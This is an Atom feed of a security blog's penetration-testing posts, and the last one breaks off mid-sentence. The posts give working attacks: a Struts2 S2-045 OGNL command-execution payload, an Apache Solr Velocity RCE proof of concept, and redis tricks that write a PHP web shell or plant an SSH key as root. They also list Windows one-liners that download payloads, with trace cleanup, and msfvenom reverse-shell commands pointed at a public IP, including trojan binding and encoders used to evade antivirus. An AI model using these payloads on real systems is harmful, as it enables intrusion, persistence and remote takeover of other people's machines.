<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>tusk1'Blog</title>
<link href="/atom.xml" rel="self"/>
<link href="http://yoursite.com/"/>
<updated>2020-03-14T15:39:28.942Z</updated>
<id>http://yoursite.com/</id>
<author>
<name>tusk1</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Struts2 vulnerability analysis: S2-045</title>
<link href="http://yoursite.com/2020/03/14/struts2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BS2-045/"/>
<id>http://yoursite.com/2020/03/14/struts2漏洞分析之S2-045/</id>
<published>2020-03-14T15:28:47.000Z</published>
<updated>2020-03-14T15:39:28.942Z</updated>
<content type="html"><![CDATA[<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h3>
<p>Affected versions: 2.3.31-2.3.5, 2.5-2.5.10.1</p>
<p>Root cause: in the method that handles file uploads, the Content-Type header carries the payload; processing fails, the exception message (which contains the payload) is captured, and that message is then evaluated as OGNL.</p>
<h3 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>Debugging analysis</h3>
<p>Before the action mapper is obtained, the HttpServletRequest is wrapped once.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-1.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-2.png" alt=""></p>
<p>It checks whether the Content-Type contains multipart/form-data, i.e. whether a file is being uploaded; if so, the uploaded file is processed.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-3.png" alt=""></p>
<p>Here the uploaded file is saved; step into this method.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-4.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-5.png" alt=""></p>
<p>If handling the file throws an exception, execution enters the buildErrorMessage method; step in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-6.png" alt=""></p>
<p>This method passes the error message to findText for processing; step in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-7.png" alt=""></p>
<p>We can see that defaultMessage contains the malicious code; keep stepping in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-8.png" alt=""></p>
<p>Here defaultMessage is passed into the getDefaultMessage method; step in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-9.png" alt=""></p>
<p>Here the result of getDefaultMessage is assigned to message, and message is handed to TextParseUtil.translateVariables for processing; step in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-11.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-12.png" alt=""></p>
<p>We can see the malicious code being passed into parser.evaluate, a method that executes OGNL expressions; step in to analyze.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-13.png" alt=""></p>
<p>Here the OGNL expression inside expression is extracted and assigned to var, and var is passed into the evaluator.evaluate method; step in.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-14.png" alt=""></p>
<p>The value is passed into stack.findValue.<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-15.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-16.png" alt=""></p>
<p>It finally reaches the getValue method, which executes the expression.</p>
<h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type:"%{(#xxx='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"whoami"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"</span><br></pre></td></tr></table></figure><p><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-17.png" alt=""></p>]]></content>
<summary type="html">
<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h3><p>Affected versions: 2.3.31-2.3.5, 2.5-2.5.10.1</p>
<p>Root cause: in the method that handles file uploads, the Content-Type header
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="RCE" scheme="http://yoursite.com/tags/RCE/"/>
<category term="Java" scheme="http://yoursite.com/tags/Java/"/>
</entry>
<entry>
<title>Apache_Solr_RCE exploitation script</title>
<link href="http://yoursite.com/2019/11/09/Apache-Solr-RCE%E5%88%A9%E7%94%A8%E8%84%9A%E6%9C%AC/"/>
<id>http://yoursite.com/2019/11/09/Apache-Solr-RCE利用脚本/</id>
<published>2019-11-08T16:20:21.000Z</published>
<updated>2019-11-08T16:26:32.703Z</updated>
<content type="html"><![CDATA[<h2 id="Apache-Solr-RCE-via-Velocity"><a href="#Apache-Solr-RCE-via-Velocity" class="headerlink" title="Apache_Solr_RCE_via_Velocity"></a>Apache_Solr_RCE_via_Velocity</h2><p>An RCE 0day in Apache Solr was disclosed recently; exploiting it requires that unauthenticated access is exposed. The original author's POC is as follows:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Apache Solr RCE via Velocity template</span><br><span class="line"></span><br><span class="line">Set "params.resource.loader.enabled" as true.</span><br><span class="line"></span><br><span class="line">Request:</span><br><span class="line">========================================================================</span><br><span class="line">POST 
/solr/test/config HTTP/1.1</span><br><span class="line">Host: solr:8983</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 259</span><br><span class="line"></span><br><span class="line">{</span><br><span class="line"> "update-queryresponsewriter": {</span><br><span class="line"> "startup": "lazy",</span><br><span class="line"> "name": "velocity",</span><br><span class="line"> "class": "solr.VelocityResponseWriter",</span><br><span class="line"> "template.base.dir": "",</span><br><span class="line"> "solr.resource.loader.enabled": "true",</span><br><span class="line"> "params.resource.loader.enabled": "true"</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">========================================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">RCE via velocity template</span><br><span class="line">Request:</span><br><span class="line">========================================================================</span><br><span class="line">GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1</span><br><span class="line">Host: localhost:8983</span><br><span class="line">========================================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Response:</span><br><span class="line">========================================================================</span><br><span class="line">HTTP/1.1 200 OK</span><br><span 
class="line">Content-Type: text/html;charset=utf-8</span><br><span class="line">Content-Length: 56</span><br><span class="line"></span><br><span class="line"> 0 uid=8983(solr) gid=8983(solr) groups=8983(solr)</span><br><span class="line">========================================================================</span><br></pre></td></tr></table></figure></p>
<p>In a real environment, replace test with the core path obtained from Core Admin:<br><img src="/2019/11/09/Apache-Solr-RCE利用脚本/11-8-1.png" alt=""><br>This project is a Java exploitation script written from the POC:<br><img src="/2019/11/09/Apache-Solr-RCE利用脚本/11-8-2.png" alt=""><br>It first checks the configuration, then executes the command.<br>Project URL: <a href="https://github.com/TU-SJ/Apache_Solr_RCE_via_Velocity" target="_blank" rel="noopener">https://github.com/TU-SJ/Apache_Solr_RCE_via_Velocity</a></p>]]></content>
<summary type="html">
<h2 id="Apache-Solr-RCE-via-Velocity"><a href="#Apache-Solr-RCE-via-Velocity" class="headerlink" title="Apache_Solr_RCE_via_Velocity"></a>Ap
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="RCE" scheme="http://yoursite.com/tags/RCE/"/>
</entry>
<entry>
<title>Pentest notes 6: writing a shell via redis</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B06-redis%E5%86%99shell/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记6-redis写shell/</id>
<published>2019-10-03T08:39:20.000Z</published>
<updated>2019-10-03T08:40:45.902Z</updated>
<content type="html"><![CDATA[<h1 id="通过备份文件"><a href="#通过备份文件" class="headerlink" title="通过备份文件"></a>Via a backup file</h1>
<h2 id="写shell"><a href="#写shell" class="headerlink" title="写shell"></a>Writing the shell</h2>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">CONFIG SET dir /var/www/html</span><br><span class="line"></span><br><span class="line">CONFIG SET dbfilename shell.php</span><br><span class="line"></span><br><span class="line">SET shell "<?php system($_GET['cmd']);?>"</span><br><span class="line"></span><br><span class="line">BGSAVE</span><br></pre></td></tr></table></figure>
<h2 id="清除痕迹"><a href="#清除痕迹" class="headerlink" title="清除痕迹"></a>Cleaning up traces</h2>
<p>1) Delete the key<br>2) Restore dir and dbfilename to their original values<br>It is best to check what the original values were beforehand with config get.</p>
<h1 id="通过ssh"><a href="#通过ssh" class="headerlink" title="通过ssh"></a>Via ssh</h1>
<p>Generate a key pair</p>
<blockquote><blockquote><p>ssh-keygen -t rsa</p></blockquote></blockquote>
<p>Generate a temporary file</p>
<blockquote><blockquote><p>(echo -e "\n\n\n"; cat id_rsa.pub; echo -e "\n\n\n") > pub.txt</p></blockquote></blockquote>
<p>Connect to redis and store the data in it</p>
<blockquote><blockquote><p>cat pub.txt| redis-cli -h 192.168.2.155 -p 6379 -a 1q2w3e4r -x set gaia</p></blockquote></blockquote>
<p>Set the directory and save the file<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">config set dir /root/.ssh/</span><br><span class="line">config set dbfilename "authorized_keys"</span><br><span class="line">save</span><br><span class="line">exit</span><br></pre></td></tr></table></figure></p>
<p>Log in to the server using the private key</p>
<blockquote><blockquote><p>ssh -i id_rsa <a 
href="mailto:[email protected]" target="_blank" rel="noopener">[email protected]</a></p></blockquote></blockquote>]]></content>
<summary type="html">
<h1 id="通过备份文件"><a href="#通过备份文件" class="headerlink" title="通过备份文件"></a>Via a backup file</h1><h2 id="写shell"><a href="#写shell" class="headerlink" titl
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
<category term="redis" scheme="http://yoursite.com/tags/redis/"/>
</entry>
<entry>
<title>Pentest notes 5: one-liner payload download</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B05-%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8B%E8%BD%BDpayload/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记5-一句话下载payload/</id>
<published>2019-10-03T08:37:33.000Z</published>
<updated>2019-10-03T08:52:03.444Z</updated>
<content type="html"><![CDATA[<h2 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h2>
<p>Certutil.exe is a command-line program installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs and certificate chains.</p>
<h3 id="下载"><a href="#下载" class="headerlink" title="下载"></a>Download</h3>
<p>By default the downloaded file is a .bin file, but this does not affect execution.<br>certutil.exe -urlcache -split -f <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p>
<h3 id="清除缓存"><a href="#清除缓存" class="headerlink" title="清除缓存"></a>Clear the cache</h3>
<p>To avoid leaving traces:<br>certutil.exe -urlcache -split -f <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a> delete</p>
<h2 id="vbs"><a href="#vbs" class="headerlink" title="vbs"></a>vbs</h2>
<p>Save as downfile.vbs:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2</span><br></pre></td></tr></table></figure></p>
<p>Or create it from the command line:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">echo set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs</span><br></pre></td></tr></table></figure></p>
<p>Run from the command line:</p><blockquote><blockquote><p>cscript downfile.vbs <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a> C:\Inetpub\b.txt</p></blockquote></blockquote>
<h3 id="参数化下载"><a href="#参数化下载" class="headerlink" title="参数化下载"></a>Parameterized download</h3>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">strFileURL = "http://192.168.1.115/robots.txt"</span><br><span class="line">strHDLocation = "c:\test\logo.txt"</span><br><span class="line">Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")</span><br><span class="line">objXMLHTTP.open "GET", strFileURL, false</span><br><span class="line">objXMLHTTP.send()</span><br><span class="line">If objXMLHTTP.Status = 200 Then</span><br><span class="line">Set objADOStream = CreateObject("ADODB.Stream")</span><br><span class="line">objADOStream.Open</span><br><span class="line">objADOStream.Type = 1</span><br><span class="line">objADOStream.Write objXMLHTTP.ResponseBody</span><br><span class="line">objADOStream.Position = 0</span><br><span class="line">Set objFSO = CreateObject("Scripting.FileSystemObject")</span><br><span class="line">If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation</span><br><span class="line">Set objFSO = Nothing</span><br><span class="line">objADOStream.SaveToFile strHDLocation</span><br><span class="line">objADOStream.Close</span><br><span class="line">Set objADOStream = Nothing</span><br><span class="line">End if</span><br><span class="line">Set objXMLHTTP = Nothing</span><br></pre></td></tr></table></figure>
<h2 id="js"><a href="#js" class="headerlink" title="js"></a>js</h2>
<p>Read:</p><blockquote><blockquote><p>cscript /nologo downfile.js <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p></blockquote></blockquote>
<p>Code:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");</span><br><span class="line">WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);</span><br><span class="line">WinHttpReq.Send();</span><br><span class="line">WScript.Echo(WinHttpReq.ResponseText);</span><br></pre></td></tr></table></figure></p>
<p>Write:</p><blockquote><blockquote><p>cscript /nologo dowfile2.js <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p></blockquote></blockquote>
<p>Code:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");</span><br><span class="line">WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);</span><br><span class="line">WinHttpReq.Send();</span><br><span class="line">BinStream = new ActiveXObject("ADODB.Stream");</span><br><span class="line">BinStream.Type = 1;</span><br><span class="line">BinStream.Open();</span><br><span class="line">BinStream.Write(WinHttpReq.ResponseBody);</span><br><span class="line">BinStream.SaveToFile("micropoor.exe");</span><br></pre></td></tr></table></figure></p>
<h2 id="bitsadmin"><a href="#bitsadmin" class="headerlink" title="bitsadmin"></a>bitsadmin</h2>
<p>bitsadmin is built into Windows 7 and later. It can download files over an unstable network, retries automatically on error, and performs well in complex network environments.</p>
<blockquote><blockquote><p>bitsadmin /rawreturn /transfer down "<a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a>" E:\PDF\robots.txt</p></blockquote></blockquote>
<p>Note that bitsadmin requires the server to support the Range header.<br>For very large files, raise the priority: after the download command above, run</p>
<blockquote><blockquote><p>bitsadmin /setpriority down foreground</p></blockquote></blockquote>
<p>If the file is between 1 and 5 MB you may want to keep an eye on progress; a progress bar is also supported.<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt</span><br></pre></td></tr></table></figure></p>
<p>The latter does not support HTTPS.</p>
<h2 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h2>
<p>PowerShell is built in from Windows 7 onward: Windows 7 ships PowerShell 2.0 and Windows 8 ships PowerShell 3.0.</p>
<p>Check the version:</p><blockquote><blockquote><p>powershell $PSVersionTable</p></blockquote></blockquote>
<p>Script:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$Urls = @()</span><br><span class="line">$Urls += "http://192.168.1.115/robots.txt"</span><br><span class="line">$OutPath = "E:\PDF\"</span><br><span class="line">ForEach ( $item in $Urls){</span><br><span class="line">$file = $OutPath + ($item).split('/')[-1]</span><br><span class="line">(New-Object System.Net.WebClient).DownloadFile($item, $file)</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<blockquote><blockquote><p>powershell C:\inetpub\down.ps1</p></blockquote></blockquote>
<p>Note: an absolute path is required.</p>
<p>From PowerShell 3.0 onward a wget-like cmdlet is available, namely Invoke-WebRequest:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$url = "http://192.168.1.115/robots.txt"</span><br><span class="line">$output = "C:\inetpub\robots.txt"</span><br><span class="line">$start_time = Get-Date</span><br><span class="line">Invoke-WebRequest -Uri $url -OutFile $output</span><br><span class="line">Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"</span><br></pre></td></tr></table></figure></p>
<p>One-liner (practical):<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')</span><br></pre></td></tr></table></figure></p>]]></content>
<summary type="html">
<h2 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h2><p>Certutil.exe is a command-line program installed as part of Certificate Services. You can use Certuti
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
</entry>
<entry>
<title>Pentest notes 4: msfvenom command notes</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B04-msfvenom%E5%91%BD%E4%BB%A4%E8%AE%B0%E5%BD%95/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记4-msfvenom命令记录/</id>
<published>2019-10-03T08:34:59.000Z</published>
<updated>2019-10-03T08:53:20.099Z</updated>
<content type="html"><![CDATA[<h2 id="有效命令"><a href="#有效命令" class="headerlink" title="有效命令"></a>Working commands</h2>
<p>msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exe<br>msfvenom -p windows/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_4.exe</p>
<h2 id="用法"><a href="#用法" class="headerlink" title="用法"></a>Usage</h2>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">MsfVenom - a Metasploit standalone payload generator.</span><br><span class="line">Also a replacement for msfpayload and msfencode.</span><br><span class="line">Usage: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom [options] <var=val></span><br><span class="line">Example: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe</span><br><span class="line"></span><br><span class="line">Options:</span><br><span class="line"> -l, --list <type> List all modules for [type]. 
Types are: payloads, encoders, nops, platforms, archs, formats, all</span><br><span class="line"> -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom</span><br><span class="line"> --list-options List --payload <value>'s standard, advanced and evasion options</span><br><span class="line"> -f, --format <format> Output format (use --list formats to list)</span><br><span class="line"> -e, --encoder <encoder> The encoder to use (use --list encoders to list)</span><br><span class="line"> --smallest Generate the smallest possible payload using all available encoders</span><br><span class="line"> -a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)</span><br><span class="line"> --platform <platform> The platform for --payload (use --list platforms to list)</span><br><span class="line"> -o, --out <path> Save the payload to a file</span><br><span class="line"> -b, --bad-chars <list> Characters to avoid example: '\x00\xff'</span><br><span class="line"> -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload</span><br><span class="line"> --pad-nops Use nopsled size specified by -n <length> as the total payload size, thus performing a subtraction to prepend a nopsled of quantity (nops minus payload length)</span><br><span class="line"> -s, --space <length> The maximum size of the resulting payload</span><br><span class="line"> --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)</span><br><span class="line"> -i, --iterations <count> The number of times to encode the payload</span><br><span class="line"> -c, --add-code <path> Specify an additional win32 shellcode file to include</span><br><span class="line"> -x, --template <path> Specify a custom executable file to use as a template</span><br><span class="line"> -k, --keep Preserve the --template behaviour and inject the payload as a new 
thread</span><br><span class="line"> -v, --var-name <value> Specify a custom variable name to use for certain output formats</span><br><span class="line"> -t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)</span><br><span class="line"> -h, --help Show this message</span><br></pre></td></tr></table></figure>
<h2 id="示例"><a href="#示例" class="headerlink" title="示例"></a>Examples</h2>
<h4 id="生成不经过编码的普通payload(不编码-gt-生成内容固定-gt-直接被杀)"><a href="#生成不经过编码的普通payload(不编码-gt-生成内容固定-gt-直接被杀)" class="headerlink" title="生成不经过编码的普通payload(不编码->生成内容固定->直接被杀)"></a>Generate a plain, unencoded payload (no encoding -> fixed content -> killed by AV immediately)</h4>
<p>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -f &lt;format&gt; -o &lt;path&gt;</p>
<blockquote><blockquote><p>msfvenom -p windows/meterpreter/reverse_tcp -f c -o 1.c</p></blockquote></blockquote>
<h4 id="经过编码器处理后生成payload"><a href="#经过编码器处理后生成payload" class="headerlink" title="经过编码器处理后生成payload"></a>Generate a payload run through an encoder</h4>
<p>msfvenom -p &lt;payload&gt; -e &lt;encoder&gt; -i &lt;encoder times&gt; -n &lt;nopsled&gt; -f &lt;format&gt; -o &lt;path&gt;</p>
<blockquote><blockquote><p>msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o C:\back.exe</p></blockquote></blockquote>
<h4 id="捆绑到正常文件后生成payload(暂未测试是否可加-e参数)"><a href="#捆绑到正常文件后生成payload(暂未测试是否可加-e参数)" class="headerlink" title="捆绑到正常文件后生成payload(暂未测试是否可加-e参数)"></a>Generate a payload bundled with a legitimate file (not yet tested whether -e can be added)</h4>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -x C:\calc.exe -k -f exe -o C:\shell.exe</span><br></pre></td></tr></table></figure>
<h4 id="查看支持的payload列表"><a href="#查看支持的payload列表" class="headerlink" title="查看支持的payload列表"></a>List supported payloads</h4>
<p>msfvenom -l payloads</p>
<h4 id="查看支持的输出文件类型"><a href="#查看支持的输出文件类型" class="headerlink" title="查看支持的输出文件类型"></a>List supported output formats</h4>
<p>msfvenom --help-formats</p>
<h4 id="查看支持的编码方式:-为了达到免杀的效果"><a href="#查看支持的编码方式:-为了达到免杀的效果" class="headerlink" title="查看支持的编码方式:(为了达到免杀的效果)"></a>List supported encoders (for AV evasion)</h4>
<p>msfvenom -l encoders</p>
<h4 id="查看支持的空字段模块:-为了达到免杀的效果"><a href="#查看支持的空字段模块:-为了达到免杀的效果" class="headerlink" title="查看支持的空字段模块:(为了达到免杀的效果)"></a>List supported NOP modules (for AV evasion)</h4>
<p>msfvenom -l nops</p>]]></content>
<summary type="html">
<h2 id="有效命令"><a href="#有效命令" class="headerlink" title="有效命令"></a>Working commands</h2><p>msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>Pentest notes 3: scanning for live hosts on the internal network</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B03-%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记3-内网存活主机扫描/</id>
<published>2019-10-03T08:32:44.000Z</published>
<updated>2019-10-03T08:41:00.974Z</updated>
<content type="html"><![CDATA[<h2 id="基于UDP"><a href="#基于UDP" class="headerlink" title="基于UDP"></a>UDP-based</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Overview</h3><p>UDP (User Datagram Protocol) is a connectionless protocol at layer 4, the transport layer, directly above IP. UDP does not segment, reassemble or order datagrams, so once a datagram has been sent there is no way to know whether it arrived safely and intact.</p><p>UDP characteristics:<br>1. UDP is unreliable. UDP itself provides no acknowledgements, retransmission timeouts or similar mechanisms. Datagrams may be duplicated or reordered in the network, and there is no guarantee that each datagram arrives exactly once.<br>2. UDP datagrams have a length. Every UDP datagram carries a length; if a datagram reaches its destination intact, that length is passed to the receiver together with the data. TCP, by contrast, is a byte-stream protocol with no record boundaries at the protocol level.<br>3. UDP is connectionless. No long-lived relationship has to exist between a UDP client and server. Most UDP implementations ignore source quench errors, so when the network is congested the destination may fail to receive large numbers of datagrams.<br>4. UDP supports multicast and broadcast.</p><h3 id="namp扫描"><a href="#namp扫描" class="headerlink" title="namp扫描"></a>nmap scan</h3><blockquote><blockquote><p>nmap -sU -T5 -sV --max-retries 1 192.168.1.100 -p 500</p></blockquote></blockquote><p>Drawback: extremely slow.</p><h3 id="msf扫描"><a href="#msf扫描" class="headerlink" title="msf扫描"></a>msf scan</h3><blockquote><blockquote><p>msf > use auxiliary/scanner/discovery/udp_probe<br>msf > use auxiliary/scanner/discovery/udp_sweep</p></blockquote></blockquote><h3 id="unicornscan扫描"><a href="#unicornscan扫描" class="headerlink" title="unicornscan扫描"></a>unicornscan scan</h3><p>Recommended on Linux.</p><blockquote><blockquote><p>unicornscan -mU 192.168.1.100</p></blockquote></blockquote><h3 id="ScanLine扫描"><a href="#ScanLine扫描" class="headerlink" title="ScanLine扫描"></a>ScanLine scan</h3><p>Recommended on Windows.</p><h2 id="基于ARP-效果好"><a href="#基于ARP-效果好" class="headerlink" title="基于ARP(效果好)"></a>ARP-based (works well)</h2><h3 id="简介-1"><a href="#简介-1" class="headerlink" title="简介"></a>Overview</h3><p>ARP is the protocol in the TCP/IP suite that resolves a network-layer address into a data-link-layer address, i.e. obtains a physical (MAC) address from an IP address. When a host wants to send to a target, it broadcasts an ARP request containing the target's IP address to every host on the network and uses the reply to determine the target's physical address.</p><h3 id="namp扫描-1"><a href="#namp扫描-1" class="headerlink" title="namp扫描"></a>nmap scan</h3><p>Accurate and fast (recommended).</p><blockquote><blockquote><p>nmap -sn -PR 192.168.1.1/24</p></blockquote></blockquote><h3 id="msf扫描-1"><a href="#msf扫描-1" class="headerlink" title="msf扫描"></a>msf scan</h3><blockquote><blockquote><p>msf > use auxiliary/scanner/discovery/arp_sweep</p></blockquote></blockquote><h3 id="netdiscover"><a href="#netdiscover" class="headerlink" title="netdiscover"></a>netdiscover</h3><blockquote><blockquote><p>root@John:~# netdiscover -r 192.168.1.0/24 -i wlan0</p></blockquote></blockquote><p>Works well.</p><h3 id="arp-scan-linux"><a href="#arp-scan-linux" class="headerlink" title="arp-scan(linux)"></a>arp-scan (Linux)</h3><p>Fast, reasonably accurate.</p><blockquote><blockquote><p>arp-scan --localnet</p></blockquote></blockquote><h3 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h3><blockquote><blockquote><p>c:\tmp>powershell.exe -exec bypass -Command "Import-Module .\arpscan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24"</p></blockquote></blockquote><h2 id="基于netbios"><a href="#基于netbios" class="headerlink" title="基于netbios"></a>NetBIOS-based</h2><h3 id="简介-2"><a href="#简介-2" class="headerlink" title="简介"></a>Overview</h3><p>Developed by IBM, NetBIOS is mainly used on small LANs of a few dozen machines. It is an application programming interface (API) that programs on a LAN can use; it gives programs a uniform command set for requesting low-level services, and its purpose is to provide networking and other special functions to the LAN. The system can use WINS, broadcasts, an Lmhosts file and other methods to resolve a NetBIOS name (the computer name obtained through the NetBIOS protocol) to the corresponding IP address, so within a LAN the NetBIOS protocol makes messaging and resource sharing 